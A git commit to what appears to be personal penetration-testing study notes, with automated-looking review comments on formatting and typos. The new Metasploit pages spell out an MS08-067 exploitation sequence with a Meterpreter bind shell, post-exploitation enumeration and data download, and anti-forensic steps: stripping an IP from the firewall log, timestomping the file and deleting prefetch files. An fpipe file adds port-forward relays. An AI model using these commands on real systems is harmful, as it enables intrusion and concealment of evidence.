Commit 46ad53e

bryfry <bryon.fryer@gmail.com>
2017-02-16 10:28:46
dump update
1 parent b804127
Changed files (8)
msf/meta/index.md
@@ -0,0 +1,8 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Metasploit Meta"
+
+---
+
+* [survey]({{< relref "msf/meta/survey.md" >}})
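Review bot: the list links only `survey.md`, but this commit also adds `msf/meta/meterpreter.md`, which is left unreachable from the index; add `* [meterpreter]({{< relref "msf/meta/meterpreter.md" >}})` beside the survey entry. The blank line inside the front matter before the closing `---` is unnecessary and is not used by the other pages' headers.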
msf/meta/meterpreter.md
@@ -0,0 +1,37 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Meterpreter"
+
+---
+
+
+
+# Port Forwards
+
+ * `meterpreter >` `portfwd add -L <LOCALIP> -l <LOCALPORT> -p <REMOTEPORT> -r <REMOTEIP>`
+
+
+
+# Examples: 
+
+0. `ms08_067_netapi` + Bind TCP
+
+  * Exploit
+      * `>` `use exploit/windows/smb/ms08_067_netapi`
+      * `>` `set payload windows/meterpreter/bind_tcp`
+      * `>` `set RHOST <REMOTE IP>`
+      * `>` `set RPORT <REMOTE PORT>`
+      * `>` `set LPORT <RANDOM HIGH PORT X>`
+      * `>` `set DisablePayloadHandler true`
+      * `>` `show options`
+      * `>` `exploit -z -j`
+  * Bind to target
+      * `>` `use exploit/multi/handler`
+      * `>` `set payload windows/meterpreter/bind_tcp`
+      * `>` `set LPORT <RANDOM HIGH PORT X>`
+      * `>` `set RHOST <REMOTE IP>`
+      * `>` `show options`
+      * `>` `exploit`
+
+
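Review bot: the `portfwd` line under Port Forwards starts with a leading space before the `*`, so some markdown renderers will not treat it as a list item; drop the space to match the other lists. The nested `Exploit` / `Bind to target` items use six-space indentation under a two-space parent, which renders inconsistently across engines, and the heading `# Examples: ` carries a trailing colon and space. Three consecutive blank lines after the front matter can be collapsed to one.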
msf/meta/survey.md
@@ -0,0 +1,87 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Meterpreter Survey - Windows"
+
+---
+
+
+# Init 
+0. **Situational Awareness**
+
+  * `getuid`  *`# Get the meterpreter current User Id`*
+  * `getpid`  *`# Get the meterpreter current PID`*
+  * `ipconfig` *`# Host Name, IP Address`*
+	* `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
+	* `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
+	* `netstat` *`# Get a list of the current connections and listening ports`*
+	* `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
+  * `pwd` 
+  * `ls`
+
+0. **System Date/Time**
+
+  * `run wmic -c "timezone list brief"` *`# Get the current time zone`* 
+  * `run wmic -c "os get localdatetime"` *`# Get the current time`*
+
+0. **Security and Settings**
+  * `run get_env` *`# Show system environment variables`*
+  * `run getcountermeasure` *`# Determine if firewall is enabled`*
+  * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
+  * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
+  * `run multicommand -cl "netsh firewall show logging"`	*`# Determine if the built-in firewall has logging enabled or disabled`*
+  * `run event_manager -i` *`# Show which Windows event logs are available`*
+
+# Users and Domains 
+
+0. **Users**
+run wmic -c "netlogin get name,lastlogon,badpasswordcount"
+													Password Settings
+
+# Software
+
+0. **Enumerate Persistance Vectors**
+
+  * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+  * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+  * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+  * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+	* `reg queryval - k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
+
+0. **Windows firewall log cleaning**
+
+  * `run multicommand -cl "findstr \"<IP ADDRESS>\" c:\\windows\\pfirewall.log"`
+	* `run multicommand -cl "cmd /c findstr /v \"<IP ADDRESS>\" c:\\windows\\pfirewall.log > c:\\temp\\pfirewall.log"`
+	* `timestomp pfirewall.log -z "MM/DD/YYYY HH:mm:ss"`
+
+0. Defender / Security Essentials
+
+reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting													
+
+0. Dr. Watson
+
+# Networking
+
+reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
+reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer													
+
+0. Local Area Networks
+
+run netenum -ps -r 172.17.20.200-172.17.20.230 		Pingsweeep of network range
+ run multicommand -cl "ping -n 2 <Target 2 IP>" 
+
+
+# Doucments and File System interactions
+search -r -d C:\\Users\\ -f *.doc					Using Meterpreter's built-in functionality, determine whether any files with a .doc extension are present on the system. Limit your search to just the user's directories.
+													Using Meterpreter's built-in functionality, search for any .log files related to Windows Defender.
+search -d "C:\\ProgamData\\Microsoft\\Windows Defender\\" -f *.log -r
+													Download to your /tmp directory the logs from the Windows Defender\Scans\History\Service subdirectory.
+download -r "C:\\ProgamData\\Microsoft\\Windows Defender\\scans\\history\\service\\" "/tmp/"
+													Using Meterpreter's built-in functionality, get a list of the registry values under the System run key.
+run multicommand -cl "cmd /c dir /o:d /t:w"			Change to the prefetch directory and get a list of directory contents, sorted oldest to newest by write time.
+													remove prefetch files that you created (post exploit)
+
+
+# Cleanup
+
+Prefetch Directory
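Review bot: several of the new command lines will not run or render as written. The winlogon line uses `reg queryval - k ...` with a space inside `- k`, so the `-k` option is not parsed; both Windows Defender `search` and `download` lines use `C:\\ProgamData`, a typo for `ProgramData`; and the first four `reg enumkey` lines are two pairs of exact duplicates. Formatting is mixed throughout: list items alternate between tab and two-space indentation, and the Users, Defender, Networking, Documents and Cleanup sections carry bare commands with tab-separated descriptions instead of the `` `cmd` *`# description`* `` list form used in Init. Spelling in headings: `Persistance` → `Persistence`, `Doucments` → `Documents`, `Pingsweeep` → `Pingsweep`. `Password Settings`, `Dr. Watson` and `Prefetch Directory` are headings with no content; mark them `# TODO` as the networking index does, or drop them until filled in. The hard-coded `172.17.20.200-172.17.20.230` range should be a placeholder like `<RANGE>`, consistent with `<Target 2 IP>` on the next line.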
networking/protocols/ethernet.md
@@ -7,7 +7,7 @@ title: "Ethernet"
 
 Systems communicating over Ethernet divide a stream of data into shorter pieces called frames. Each frame contains source and destination MAC addresses, and error-checking data so that damaged frames can be detected and discarded; most often, higher-layer protocols trigger retransmission of lost frames. As per the OSI model, Ethernet provides services up to and including the data link layer.[1]
 
-## PN Headers
+## Ethernet Headers
 
 ```    
                           1   	 
@@ -18,7 +18,7 @@ byte  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-....   A   .-+-+-+-+-+
 ```
 
-## PN Header Descriptions
+## Ethernet Header Descriptions
 
 | Bytes                    | Name                         | Description                                                          |
 |--------------------------|------------------------------|----------------------------------------------------------------------|
@@ -26,9 +26,6 @@ byte  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4
 | `ether[6:4], ether[8:2]` | Src MAC Address              |                                                                      |
 | `ether[12:2]`            | [EtherType](./ether_type.md) | indicates which protocol is encapsulated in the payload of the frame |
 
-- bytes are in bpf filter notation
-- name is usually the abbreviated name
-- description usulally has the full name and a short description
 
 ## Additional resources
 
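Review bot: removing the three legend bullets drops the only explanation that the `Bytes` column (`ether[6:4]`, `ether[12:2]`) is written in BPF filter notation, which a reader of the table needs to interpret the offsets. Keep the legend (correcting `usulally` to `usually`) or fold it into the sentence introducing the table.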
networking/protocols/index.md
@@ -7,9 +7,9 @@ title: "Networking"
 
 ## Protocols
 
-* [Ethernet]({{< relref "negttworking/protocols/ethernet.md" >}})
+* [Ethernet]({{< relref "networking/protocols/ethernet.md" >}})
 * [VLAN]({{< relref "networking/protocols/vlan.md" >}})
-* [IP]({{< relref "networking/protocols/ipv4.md" >}})
+* [IP]({{< relref   "networking/protocols/ipv4.md" >}})
 * [TCP]({{< relref "networking/protocols/tcp.md" >}})
 * [UDP]({{< relref "networking/protocols/udp.md" >}})
 * [ARP]({{< relref "networking/protocols/arp.md" >}}) # TODO
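Review bot: the IPv4 line now reads `{{< relref   "networking/protocols/ipv4.md" >}}` with three spaces after `relref`; this is a whitespace-only change that adds noise to the diff, so revert it to a single space like the neighbouring links. The ARP entry's trailing `# TODO` is rendered literally inside the list; an HTML comment (`<!-- TODO -->`) or a `(TODO)` suffix would be cleaner.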
networking/protocols/ipv4.md
@@ -1,6 +1,6 @@
 ---
 date:  "2016-12-01"
-draft: true
+draft: false
 title: "IPv4"
 
 ---
windows/meta/survey.md
@@ -141,7 +141,8 @@ title: "Windows Survey"
 
     All the DLLs that are specified in this value are loaded by each Microsoft Windows-based application that is running in the current log on session. (TODO: move to registry.md, link to there)
 
-0. **Enumerate Persistance**
+0. **Enumerate Persistance Vectors**
+
   * `autorunsc <-b|-l>` *`# show boot and logon auto startups `*
   * `reg query hklm\software\microsoft\windows\currentversion\run`
   * `reg query hkcu\software\microsoft\windows\currentversion\run`
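Review bot: the renamed heading still spells `Persistance`; it should read `Enumerate Persistence Vectors`. The same misspelling appears in the heading added to `msf/meta/survey.md` in this commit, so both can be fixed together.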
windows/misc/fpipe
@@ -0,0 +1,5 @@
+
+
+fpipe -l 8080 -r 445 192.168.0.10
+fpipe -l 5353 -r 5353 198.18.30.5
+fpipe -l 4444 -r 4444 192.168.0.10
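Review bot: `windows/misc/fpipe` has no `.md` extension and no front matter, so the site generator will not render it alongside the other pages, and the three commands carry no description of what they do. Rename it to `fpipe.md`, add the usual `date` / `draft` / `title` header, and add a one-line note that `-l` is the local listen port, `-r` the remote port, and the last argument the host to forward to. The hard-coded addresses should be placeholders like `<TARGET IP>`, matching the other pages.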